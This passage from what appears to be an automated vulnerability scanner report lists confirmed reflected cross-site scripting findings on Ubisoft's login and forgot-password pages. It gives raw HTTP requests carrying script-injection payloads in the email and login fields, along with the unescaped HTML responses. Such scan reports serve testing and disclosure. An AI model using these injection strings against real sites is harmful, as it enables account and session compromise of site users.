value="y1968">1968</option><option value="y1967">1967</option><option value="y1966">1966</option><option value="y1965">1965</option><option value="y1964">1964</option><option value="y1963">1963</option><option value="y1962">1962</option><option value="y1961">1961</option><option value="y1960">1960</option><option value="y1959">1959</option><option value="y1958">1958</option><option value="y1957">1957</option><option value="y1956">1956</option><option value="y1955">1955</option><option value="y1954">1954</option><option value="y1953">1953</option><option value="y1952">1952</option><option value="y1951">1951</option><option value="y1950">1950</option><option value="y1949">1949</option><option value="y1948">1948</option><option value="y1947">1947</option><option value="y1946">1946</option><option value="y1945">1945</option><option value="y1944">1944</option><option value="y1943">1943</option><option value="y1942">1942</option><option value="y1941">1941</option><option value="y1940">1940</option><option value="y1939">1939</option><option value="y1938">1938</option><option value="y1937">1937</option><option value="y1936">1936</option><option value="y1935">1935</option><option value="y1934">1934</option><option value="y1933">1933</option><option value="y1932">1932</option><option value="y1931">1931</option><option value="y1930">1930</option><option value="y1929">1929</option><option value="y1928">1928</option><option value="y1927">1927</option><option value="y1926">1926</option><option value="y1925">1925</option><option value="y1924">1924</option><option value="y1923">1923</option><option value="y1922">1922</option><option value="y1921">1921</option><option value="y1920">1920</option><option value="y1919">1919</option><option value="y1918">1918</option><option value="y1917">1917</option><option value="y1916">1916</option><option value="y1915">1915</option><option value="y1914">1914</option><option value="y1913">1913</option><option value="y1912">1912</option><option value="y1911">1911</option><option value="y1910">1910</option></select></td>
</tr>
<tr>
<td/>
<td></td>
</tr>
<tr>
<td/>
<td height="10" />
</tr>


<input type="hidden" name="_buttonClicked" id="_buttonClicked" value="submit">

<tr>
<td/>
<td height="30" />
</tr>
<tr>
<td/>
<td><input type="image" name="m_ImageButtonSubmit" id="m_ImageButtonSubmit" onclick="document.forms['UIMForm']._buttonClicked.value='submit';return true;" OnMouseOver="UBI_SetImage('m_ImageButtonSubmit','/login/Skins/default/en-US/btn_Submit_over.gif')" OnMouseOut="UBI_SetImage('m_ImageButtonSubmit','/login/Skins/default/en-US/btn_Submit.gif')" src="/login/Skins/default/en-US/btn_Submit.gif" alt="" border="0" />
<a OnMouseOver="UBI_SetImage('m_ImageCancel','/login/Skins/default/en-US/btn_Cancel_over.gif')" OnMouseOut="UBI_SetImage('m_ImageCancel','/login/Skins/default/en-US/btn_Cancel.gif')" href="/login/Login.aspx"><img id="m_ImageCancel" src="/login/Skins/default/en-US/btn_Cancel.gif" alt="" border="0" /></a></td>
</tr>




</table>

</div>
<div style="clear:both;"></div>

<table>
<tr>
<td>

<!--FOOTER en-US-->
<div id="footer">

<div style="float:right; margin-top:5px;">
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=PrivacyPolicy"><img src="/login/Skins/images/ectppsubisoft.gif" alt="" border="0" /></a>
</div>

<p>
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=PrivacyPolicy">Privacy Policy</a> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagn..
- /login/ForgotPassword.aspx

/login/ForgotPassword.aspx CONFIRMED

https://secure.ubi.com/login/ForgotPassword.aspx

Parameters

Parameter Type Value
__VIEWSTATE POST dDw5NDczMzQ3NTY7Oz7T7OeCCTsLqtgRXk0b2JwMM7a1ag==
email POST '"--></style></script><script>alert(0x00041B)</script>
birthdate POST ------
_buttonClicked POST submit

Request

POST /login/ForgotPassword.aspx HTTP/1.1
Referer: https://secure.ubi.com/login/ForgotPassword.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.ubi.com
Cookie: ASP.NET_SessionId=mwhoe5jronoube55jd2gaazw; cookie_enabled=true; ASP.NET_SessionId=vfo11q45ehliqg55jytcst55; visitor_id=C9CA41E2-0082-41FF-B6C4-AA2B7A20EE48; utsver=30053; ubisession=1976810880
Content-Length: 195
Accept-Encoding: gzip, deflate

__VIEWSTATE=dDw5NDczMzQ3NTY7Oz7T7OeCCTsLqtgRXk0b2JwMM7a1ag%3d%3d&email='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00041B)%3c%2fscript%3e&birthdate=------&_buttonClicked=submit

Response

HTTP/1.1 200 OK
Date: Fri, 22 Apr 2011 16:27:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 18125


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<HTML
lang="en-US"
dir="ltr">
<HEAD>
<title>Ubisoft - Forgot Your Password?</title> <link href="/login/Skins/stylesheet.css" type="text/css" rel="stylesheet"/> <meta name="Content-Language" content="en-US"/><script type="text/javascript" src="/login/scripts/mbox.js"></script><script type="text/javascript" src="/login/scripts/HelpLayer.js"></script><script type="text/javascript" src="/login/scripts/wfu.js"></script><script type="text/javascript" src="/login/scripts/image_swapper.js"></script><script type="text/javascript" src="/login/scripts/displayAndHideQuestions.js"></script><script type="text/javascript" src="/login/scripts/layers.js"></script><link href="/login/Skins/default/stylesheet.css" type="text/css" rel="stylesheet" />
</HEAD>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<form name="UIMForm" method="post" action="ForgotPassword.aspx" id="UIMForm">
<input type="hidden" name="__VIEWSTATE" value="dDw5NDczMzQ3NTY7Oz7T7OeCCTsLqtgRXk0b2JwMM7a1ag==" />

<script type="text/javascript" src="https://secure.ubi.com/toolbar/barreubi.php?lang=en-US&disablesignuplogout=1&toolbarwidth=750&loginnexturl=http://www.ubi.com/US/&displaytoolbar=true&encoding=UTF8&secure=true&toolbaralign=center&loginskin=default&disableloginedit=1"></script>

<script type="text/javascript"><!--
function onSearchProductsKeyPress()
{
if (event.keyCode == 13)
goSearchProducts();
}
function goSearchProducts()
{
var pattern = document.getElementById('masterhead_game_search').value;
document.location.href = 'http://www.ubi.com/US/Games/Search.aspx?q=' + escape(pattern);
return true;
}
// -->
</script>

<table width="100%" align="center" cellspacing="0" cellpadding="0">
<tr>
<td align="center">
<div id="wrapper">

<div id="content">

<div id="leftContent">

<table cellpadding="2" cellspacing="4" id="leftInfo">
<tr>
<td colspan="3">
<img src="/login/Skins/default/en-US/RegisterNow.jpg" border="0" />
</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3" class="leftInfoItem"><span style="margin-left:15px;">Why Should I Sign Up?</span></td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>

<tr>
<td style="width:25px;">&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Receive the monthly newsletter.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Play your favorite online games.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Read the latest game news.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Enjoy exclusive store promotions.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Compete for prizes.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Participate in community forums.</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3">
<a href="/login/CreateUser.aspx" onMouseOver="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now_over.gif')" onMouseOut="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now.gif')">
<img id="registernow2" src="/login/Skins/default/en-US/btn_register_now.gif" border="0">
</a>
</td>
</tr>
</table>


</div>

<div id="rightContent">

<p>
<img class="imgAlign" src="/login/Skins/default/en-US/registerTitle.jpg" border="0">
</p>
<p/>
<p/>
<p/>
<p/>


<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>


<table class="headInfo" width="450" border="0" cellspacing="0" cellpadding="0">

<tr>
<td colspan="2"><img src="/login/Skins/default/en-US/tl_forgotten_password.gif" border="0" /></td>
</tr>
<tr><td></td><td class="mainMessage"><br><br>For security reasons, we don't send passwords via email. You must reset your password. Enter your email address and Date Of Birth, to receive instructions on password resetting.</td></tr>

</table>

<table cellpadding="0" cellspacing="0" id="loginTable">


<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td><font class="fieldnameerror">Email</font></td>
</tr>
<tr>
<td/>
<td><input id="email" name="email" type="text" maxlength="150" value="'"--></style></script><script>netsparker(0x00041B)</script>" class="inputloginerror"></td>
</tr>
<tr>
<td/>
<td></td>
</tr>
<tr>
<td/>
<td height="10" />
</tr>




<tr>
<td/>
<td><font class="fieldname">Date of Birth</font></td>
</tr>
<tr>
<td/>
<td><select id="birthdate_m" name="birthdate" class="inputlogindate"><option>------</option><option value="m1">Jan</option><option value="m2">Feb</option><option value="m3">Mar</option><option value="m4">Apr</option><option value="m5">May</option><option value="m6">Jun</option><option value="m7">Jul</option><option value="m8">Aug</option><option value="m9">Sep</option><option value="m10">Oct</option><option value="m11">Nov</option><option value="m12">Dec</option></select><select id="birthdate_d" name="birthdate" class="inputlogindate"><option>------</option><option value="d1">1</option><option value="d2">2</option><option value="d3">3</option><option value="d4">4</option><option value="d5">5</option><option value="d6">6</option><option value="d7">7</option><option value="d8">8</option><option value="d9">9</option><option value="d10">10</option><option value="d11">11</option><option value="d12">12</option><option value="d13">13</option><option value="d14">14</option><option value="d15">15</option><option value="d16">16</option><option value="d17">17</option><option value="d18">18</option><option value="d19">19</option><option value="d20">20</option><option value="d21">21</option><option value="d22">22</option><option value="d23">23</option><option value="d24">24</option><option value="d25">25</option><option value="d26">26</option><option value="d27">27</option><option value="d28">28</option><option value="d29">29</option><option value="d30">30</option><option value="d31">31</option></select><select id="birthdate_y" name="birthdate" class="inputlogindate"><option>------</option><option value="y2011">2011</option><option value="y2010">2010</option><option value="y2009">2009</option><option value="y2008">2008</option><option value="y2007">2007</option><option value="y2006">2006</option><option value="y2005">2005</option><option value="y2004">2004</option><option value="y2003">2003</option><option value="y2002">2002</option><option value="y2001">2001</option><option value="y2000">2000</option><option value="y1999">1999</option><option value="y1998">1998</option><option value="y1997">1997</option><option value="y1996">1996</option><option value="y1995">1995</option><option value="y1994">1994</option><option value="y1993">1993</option><option value="y1992">1992</option><option value="y1991">1991</option><option value="y1990">1990</option><option value="y1989">1989</option><option value="y1988">1988</option><option value="y1987">1987</option><option value="y1986">1986</option><option value="y1985">1985</option><option value="y1984">1984</option><option value="y1983">1983</option><option value="y1982">1982</option><option value="y1981">1981</option><option value="y1980">1980</option><option value="y1979">1979</option><option value="y1978">1978</option><option value="y1977">1977</option><option value="y1976">1976</option><option value="y1975">1975</option><option value="y1974">1974</option><option value="y1973">1973</option><option value="y1972">1972</option><option value="y1971">1971</option><option value="y1970">1970</option><option value="y1969">1969</option><option value="y1968">1968</option><option value="y1967">1967</option><option value="y1966">1966</option><option value="y1965">1965</option><option value="y1964">1964</option><option value="y1963">1963</option><option value="y1962">1962</option><option value="y1961">1961</option><option value="y1960">1960</option><option value="y1959">1959</option><option value="y1958">1958</option><option value="y1957">1957</option><option value="y1956">1956</option><option value="y1955">1955</option><option value="y1954">1954</option><option value="y1953">1953</option><option value="y1952">1952</option><option value="y1951">1951</option><option value="y1950">1950</option><option value="y1949">1949</option><option value="y1948">1948</option><option value="y1947">1947</option><option value="y1946">1946</option><option value="y1945">1945</option><option value="y1944">1944</option><option value="y1943">1943</option><option value="y1942">1942</option><option value="y1941">1941</option><option value="y1940">1940</option><option value="y1939">1939</option><option value="y1938">1938</option><option value="y1937">1937</option><option value="y1936">1936</option><option value="y1935">1935</option><option value="y1934">1934</option><option value="y1933">1933</option><option value="y1932">1932</option><option value="y1931">1931</option><option value="y1930">1930</option><option value="y1929">1929</option><option value="y1928">1928</option><option value="y1927">1927</option><option value="y1926">1926</option><option value="y1925">1925</option><option value="y1924">1924</option><option value="y1923">1923</option><option value="y1922">1922</option><option value="y1921">1921</option><option value="y1920">1920</option><option value="y1919">1919</option><option value="y1918">1918</option><option value="y1917">1917</option><option value="y1916">1916</option><option value="y1915">1915</option><option value="y1914">1914</option><option value="y1913">1913</option><option value="y1912">1912</option><option value="y1911">1911</option><option value="y1910">1910</option></select></td>
</tr>
<tr>
<td/>
<td></td>
</tr>
<tr>
<td/>
<td height="10" />
</tr>


<input type="hidden" name="_buttonClicked" id="_buttonClicked" value="submit">

<tr>
<td/>
<td height="30" />
</tr>
<tr>
<td/>
<td><input type="image" name="m_ImageButtonSubmit" id="m_ImageButtonSubmit" onclick="document.forms['UIMForm']._buttonClicked.value='submit';return true;" OnMouseOver="UBI_SetImage('m_ImageButtonSubmit','/login/Skins/default/en-US/btn_Submit_over.gif')" OnMouseOut="UBI_SetImage('m_ImageButtonSubmit','/login/Skins/default/en-US/btn_Submit.gif')" src="/login/Skins/default/en-US/btn_Submit.gif" alt="" border="0" />
<a OnMouseOver="UBI_SetImage('m_ImageCancel','/login/Skins/default/en-US/btn_Cancel_over.gif')" OnMouseOut="UBI_SetImage('m_ImageCancel','/login/Skins/default/en-US/btn_Cancel.gif')" href="/login/Login.aspx"><img id="m_ImageCancel" src="/login/Skins/default/en-US/btn_Cancel.gif" alt="" border="0" /></a></td>
</tr>




</table>

</div>
<div style="clear:both;"></div>

<table>
<tr>
<td>

<!--FOOTER en-US-->
<div id="footer">

<div style="float:right; margin-top:5px;">
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=PrivacyPolicy"><img src="/login/Skins/images/ectppsubisoft.gif" alt="" border="0" /></a>
</div>

<p>
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=PrivacyPolicy">Privacy Policy</a> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagn..
- /login/Login.aspx

/login/Login.aspx CONFIRMED

https://secure.ubi.com/login/Login.aspx

Parameters

Parameter Type Value
__VIEWSTATE POST dDw5NDczMzQ3NTY7Oz6SkTaBkfFzxohTBeZCkkIG8i63Mg==
login POST '"--></style></script><script>alert(0x0003DA)</script>
password POST 3
RememberPassword POST 1
_buttonClicked POST submit

Request

POST /login/Login.aspx HTTP/1.1
Referer: https://secure.ubi.com/login/Login.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.ubi.com
Cookie: ASP.NET_SessionId=mwhoe5jronoube55jd2gaazw; cookie_enabled=true; ASP.NET_SessionId=vfo11q45ehliqg55jytcst55; visitor_id=C9CA41E2-0082-41FF-B6C4-AA2B7A20EE48; utsver=30053; ubisession=1976810880
Content-Length: 208
Accept-Encoding: gzip, deflate

__VIEWSTATE=dDw5NDczMzQ3NTY7Oz6SkTaBkfFzxohTBeZCkkIG8i63Mg%3d%3d&login='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0003DA)%3c%2fscript%3e&password=3&RememberPassword=1&_buttonClicked=submit

Response

HTTP/1.1 200 OK
Date: Fri, 22 Apr 2011 16:27:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 13495


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<HTML
lang="en-US"
dir="ltr">
<HEAD>
<title>Ubisoft - Log In</title> <link href="/login/Skins/stylesheet.css" type="text/css" rel="stylesheet"/> <meta name="Content-Language" content="en-US"/><script type="text/javascript" src="/login/scripts/mbox.js"></script><script type="text/javascript" src="/login/scripts/HelpLayer.js"></script><script type="text/javascript" src="/login/scripts/wfu.js"></script><script type="text/javascript" src="/login/scripts/image_swapper.js"></script><script type="text/javascript" src="/login/scripts/displayAndHideQuestions.js"></script><script type="text/javascript" src="/login/scripts/layers.js"></script><link href="/login/Skins/default/stylesheet.css" type="text/css" rel="stylesheet" />
</HEAD>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<form name="UIMForm" method="post" action="Login.aspx" id="UIMForm">
<input type="hidden" name="__VIEWSTATE" value="dDw5NDczMzQ3NTY7Oz6SkTaBkfFzxohTBeZCkkIG8i63Mg==" />

<script type="text/javascript" src="https://secure.ubi.com/toolbar/barreubi.php?lang=en-US&disablesignuplogout=1&toolbarwidth=750&loginnexturl=http://www.ubi.com/US/&displaytoolbar=true&encoding=UTF8&secure=true&toolbaralign=center&loginskin=default&disableloginedit=1"></script>

<script type="text/javascript"><!--
function onSearchProductsKeyPress()
{
if (event.keyCode == 13)
goSearchProducts();
}
function goSearchProducts()
{
var pattern = document.getElementById('masterhead_game_search').value;
document.location.href = 'http://www.ubi.com/US/Games/Search.aspx?q=' + escape(pattern);
return true;
}
// -->
</script>

<table width="100%" align="center" cellspacing="0" cellpadding="0">
<tr>
<td align="center">
<div id="wrapper">

<div id="content">

<div id="leftContent">

<table cellpadding="2" cellspacing="4" id="leftInfo">
<tr>
<td colspan="3">
<img src="/login/Skins/default/en-US/RegisterNow.jpg" border="0" />
</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3" class="leftInfoItem"><span style="margin-left:15px;">Why Should I Sign Up?</span></td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>

<tr>
<td style="width:25px;">&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Receive the monthly newsletter.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Play your favorite online games.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Read the latest game news.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Enjoy exclusive store promotions.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Compete for prizes.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Participate in community forums.</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3">
<a href="/login/CreateUser.aspx" onMouseOver="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now_over.gif')" onMouseOut="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now.gif')">
<img id="registernow2" src="/login/Skins/default/en-US/btn_register_now.gif" border="0">
</a>
</td>
</tr>
</table>


</div>

<div id="rightContent">

<p>
<img class="imgAlign" src="/login/Skins/default/en-US/registerTitle.jpg" border="0">
</p>
<p/>
<p/>
<p/>
<p/>


<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>


<table class="headInfo" width="450" border="0" cellspacing="0" cellpadding="0">

</table>

<table cellpadding="0" cellspacing="0" id="loginTable">


<tr>
<td>&nbsp;</td>
<td><b class="errormessage">The user name you entered is invalid. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td><font class="fieldname">User Name or Email</font></td>
</tr>
<tr>
<td/>
<td><input id="login" name="login" type="text" maxlength="150" value="'"--></style></script><script>netsparker(0x0003DA)</script>" class="inputlogin"></td>
</tr>
<tr>
<td/>
<td></td>
</tr>
<tr>
<td/>
<td height="10" />
</tr>




<tr>
<td/>
<td><font class="fieldname">Password</font></td>
</tr>
<tr>
<td/>
<td><input id="password" name="password" type="password" maxlength="16" value="3" class="inputlogin"></td>
</tr>
<tr>
<td/>
<td><a class="link" tabindex=-1 href="/login/ForgotPassword.aspx">Forgot your password?</a></td>
</tr>
<tr>
<td/>
<td height="10" />
</tr>




<tr>
<td/>
<td></td>
</tr>
<tr>
<td/>
<td><table border="0" cellpadding="0" cellspacing="0"> <tr> <td rowspan="2"><input type="checkbox" name="RememberPassword" value="1"></td> <td rowspan="2"><img src="/login/Skins/images/b.gif" width="5" height="0" border="0" alt=""></td> <td class="content">Remember me on this computer</td> </tr> <tr> <td valign="top"> <a class="link" tabIndex=-1 href='/login/Help.aspx'>What does this mean?</a> </td> </tr></table></td>
</tr>
<tr>
<td/>
<td></td>
</tr>
<tr>
<td/>
<td height="10" />
</tr>


<input type="hidden" name="_buttonClicked" id="_buttonClicked" value="submit">

<tr>
<td/>
<td height="30" />
</tr>
<tr>
<td/>
<td><input type="image" name="m_ImageButtonSubmit" id="m_ImageButtonSubmit" onclick="document.forms['UIMForm']._buttonClicked.value='submit';return true;" OnMouseOver="UBI_SetImage('m_ImageButtonSubmit','/login/Skins/default/en-US/btn_Submit_over.gif')" OnMouseOut="UBI_SetImage('m_ImageButtonSubmit','/login/Skins/default/en-US/btn_Submit.gif')" src="/login/Skins/default/en-US/btn_Submit.gif" alt="" border="0" />
<a OnMouseOver="UBI_SetImage('m_ImageCancel','/login/Skins/default/en-US/btn_Cancel_over.gif')" OnMouseOut="UBI_SetImage('m_ImageCancel','/login/Skins/default/en-US/btn_Cancel.gif')" href="http://www.ubi.com/US/"><img id="m_ImageCancel" src="/login/Skins/default/en-US/btn_Cancel.gif" alt="" border="0" /></a></td>
</tr>




</table>

</div>
<div style="clear:both;"></div>

<table>
<tr>
<td>

<!--FOOTER en-US-->
<div id="footer">

<div style="float:right; margin-top:5px;">
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=PrivacyPolicy"><img src="/login/Skins/images/ectppsubisoft.gif" alt="" border="0" /></a>
</div>

<p>
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=PrivacyPolicy">Privacy Policy</a> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=TermsOfUse">Terms of Use</a> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=Legal">Legal Info</a> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=ContactUs">Contact Us</a> |
<a href="http://www.ubisoftgroup.com/Jobs/Default.aspx?country=US">Employment</a> |
<a href="http://www.ubisoftgroup.com/MediaCenter/Default.aspx?lang=en-US">Presse</A> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=About">About Ubisoft</A>
</p>
<p>© 2008 Ubisoft Entertainment. All Rights Reserved.<br/>
Ubisoft, Ubi.com and the Ubisoft logo are trademarks of Ubisoft Entertainment in the U.S. and/or other countries.</p>
</div>
<!--END FOOTER en-US-->
<tr><td>
<!-- Ubi stat code start -->
<script type='text/javascript'>
<!--
ubi_tag = 'WEB.PTL_UBISOFT.NOPRODUCT.en-US.REGISTRATION_SIGNUP_LOGIN';
ubi_system = 'WEB';
ubi_umon_domain = 'uts.ubi.com';
ubi_umon_protocol = 'https';
-->
</script>
<script type='text/javascript' src='https://uts.ubi.com/scripts/umon2.1.js'>
</script>
<noscript>
<img height=1 width=1 src='https://uts.ubi.com/stats.aspx?system=WEB&tag=WEB.PTL_UBISOFT.NOPRODUCT.en-US.REGISTRATION_SIGNUP_LOGIN&ref=https%3a%2f%2fsecure.ubi.com%2flogin%2fLogin.aspx'>
</noscript>
<!-- Ubi stat code end -->
</td></tr>
</td>
</tr>
</table>


</div>
<div style="clear:both;"></div>

</div>

</tr>
</td>
</table>







<div id="toolTipLayerSizeDetect" style="position:absolute; visibility: hidden; left:0;"></div>
<div id="toolTipLayer" style="position:absolute; visibility: hidden; left:0;"></div>
<script language="JavaScript">
<!--
var ns4 = document.layers;
var ns6 = document.getElementById && !document.all;
var ie4 = document.all;

initToolTips();

function toolTip(msg)
{
var bLocationTop = 0;

var curHeight = 0;

putToolTipContent(msg, true, true);

if(toolTipLayerSizeDetectObject.clientHeight){
curHeight = toolTipLayerSizeDetectObject.clientHeight;
}else{
curHeight = toolTipLayerSizeDetectObject.offsetHeight;
}

if (ns4||ns6){
if (yCoordinate < curHeight){
putToolTipContent(msg, false, true);
}else{
putToolTipContent(msg, false, false);
}
}
else{
if (event.clientY < curHeight){
putToolTipContent(msg, false, true);
}else{
putToolTipContent(msg, false, false);
}
}
}

function putToolTipContent(msg, bTestDiv, bTop){
var content= '';

if (bTop)
{
content = ' <table width="250" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="5"><img src="/login/Skins/images/b_top_left.gif" width="5" height="13"></td> <td width="240" background="/login/Skins/images/b_top.gif"><img src="/login/Skins/images/b_arrow_top.gif" width="33" height="13"></td> <td width="5"><img src="/login/Skins/images/b_top_right.gif" width="5" height="13"></td> </tr> <tr> <td background="/login/Skins/images/b_left.gif">&nbsp;</td> <td valign="top" background="/login/Skins/images/b_bg_tile.gif" class="helplayer"> ' + msg + ' </td> <td background="/login/Skins/images/b_right.gif">&nbsp;</td> </tr> <tr> <td><img src="/login/Skins/images/b_bottom_left.gif" width="5" height="13"></td> <td background="/login/Skins/images/b_bottom.gif"></td> <td><img src="/login/Skins/images/b_bottom_right.gif" width="5" height="13"></td> </tr> </table> ';
}
else
{
content = ' <table width="250" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="5"><img src="/login/Skins/images/b_top_left.gif" width="5" height="13"></td> <td width="240" background="/login/Skins/images/b_top.gif"></td> <td width="5"><img src="/login/Skins/images/b_top_right.gif" width="5" height="13"></td> </tr> <tr> <td background="/login/Skins/images/b_left.gif">&nbsp;</td> <td valign="top" background="/login/Skins/images/b_bg_tile.gif" class="helplayer"> ' + msg + ' </td> <td background="/login/Skins/images/b_right.gif">&nbsp;</td> </tr> <tr> <td><img src="/login/Skins/images/b_bottom_left.gif" width="5" height="13"></td> <td background="/login/Skins/images/b_bottom.gif"><img src="/login/Skins/images/b_arrow_bottom.gif" width="33" height="13"></td> <td><img src="/login/Skins/images/b_bottom_right.gif" width="5" height="13"></td> </tr> </table> ';
}

if(bTestDiv){
if(ns4)
{
toolTipSTYLE_DETECT.document.write(content);
toolTipSTYLE_DETECT.document.close();
}
if(ns6)
{
document.getElementById("toolTipLayerSizeDetect").innerHTML=content;
}
if(ie4)
{
document.all("toolTipLayerSizeDetect").innerHTML=content;
}
}else{
if(ns4)
{
toolTipSTYLE.document.write(content);
toolTipSTYLE.document.close();
toolTipSTYLE.visibility = "visible";
}
if(ns6)
{
document.getElementById("toolTipLayer").innerHTML = content;
toolTipSTYLE.display='block';
}
if(ie4)
{
document.all("toolTipLayer").innerHTML=content;
toolTipSTYLE.display='block';
}
}
}

//-->
</script>

<..
- /login/ForgotPassword.aspx

/login/ForgotPassword.aspx CONFIRMED

https://secure.ubi.com/login/ForgotPassword.aspx

Parameters

Parameter Type Value
__VIEWSTATE POST dDw5NDczMzQ3NTY7Oz7T7OeCCTsLqtgRXk0b2JwMM7a1ag==
email POST '"--></style></script><script>alert(0x00042E)</script>
birthdate POST ------
_buttonClicked POST submit
m_ImageButtonSubmit.x POST 0
m_ImageButtonSubmit.y POST 0

Request

POST /login/ForgotPassword.aspx HTTP/1.1
Referer: https://secure.ubi.com/login/ForgotPassword.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.ubi.com
Cookie: ASP.NET_SessionId=mwhoe5jronoube55jd2gaazw; cookie_enabled=true; ASP.NET_SessionId=vfo11q45ehliqg55jytcst55; visitor_id=C9CA41E2-0082-41FF-B6C4-AA2B7A20EE48; utsver=30053; ubisession=1976810880
Content-Length: 243
Accept-Encoding: gzip, deflate

__VIEWSTATE=dDw5NDczMzQ3NTY7Oz7T7OeCCTsLqtgRXk0b2JwMM7a1ag%3d%3d&email='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00042E)%3c%2fscript%3e&birthdate=------&_buttonClicked=submit&m_ImageButtonSubmit.x=0&m_ImageButtonSubmit.y=0

Response

HTTP/1.1 200 OK
Date: Fri, 22 Apr 2011 16:28:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 18125


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<HTML
lang="en-US"
dir="ltr">
<HEAD>
<title>Ubisoft - Forgot Your Password?</title> <link href="/login/Skins/stylesheet.css" type="text/css" rel="stylesheet"/> <meta name="Content-Language" content="en-US"/><script type="text/javascript" src="/login/scripts/mbox.js"></script><script type="text/javascript" src="/login/scripts/HelpLayer.js"></script><script type="text/javascript" src="/login/scripts/wfu.js"></script><script type="text/javascript" src="/login/scripts/image_swapper.js"></script><script type="text/javascript" src="/login/scripts/displayAndHideQuestions.js"></script><script type="text/javascript" src="/login/scripts/layers.js"></script><link href="/login/Skins/default/stylesheet.css" type="text/css" rel="stylesheet" />
</HEAD>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<form name="UIMForm" method="post" action="ForgotPassword.aspx" id="UIMForm">
<input type="hidden" name="__VIEWSTATE" value="dDw5NDczMzQ3NTY7Oz7T7OeCCTsLqtgRXk0b2JwMM7a1ag==" />

